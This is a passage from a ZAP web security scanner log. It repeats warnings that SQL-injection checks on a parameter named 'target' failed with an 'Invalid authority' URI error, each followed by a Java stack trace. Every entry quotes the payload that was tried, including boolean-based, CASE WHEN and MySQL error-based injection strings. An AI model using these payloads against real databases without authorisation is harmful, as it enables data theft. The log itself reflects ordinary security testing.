org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685313 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND 3206=7659 AND ('oDjw'='oDjw] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685323 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND 2490=7203 AND 'Ngvr'='Ngvr] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685326 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND 8870=8870 AND 'umUN'='umUN] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685328 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND 2490=7203 AND 'Ngvr'='Ngvr] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685329 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND 6656=2760 AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685331 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND 6517=6517 AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685336 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND 6656=2760 AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685339 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 8500=9467-- eOin] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685342 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 9160=9160-- bAne] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685343 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 8500=9467-- eOin] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685344 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3543=2226) THEN 3543 ELSE 3543*(SELECT 3543 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685347 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3245=3245) THEN 3245 ELSE 3245*(SELECT 3245 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685360 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3543=2226) THEN 3543 ELSE 3543*(SELECT 3543 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685364 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND (SELECT 7148 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7148=7148,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3808=3808] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685367 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND (SELECT 7580 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7580=7580,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685372 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6891=7242) THEN 6891 ELSE 6891*(SELECT 6891 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685372 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND (SELECT 6103 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6103=6103,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('KedB'='KedB] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685374 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND (SELECT 7501 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7501=7501,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yEdR'='yEdR] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 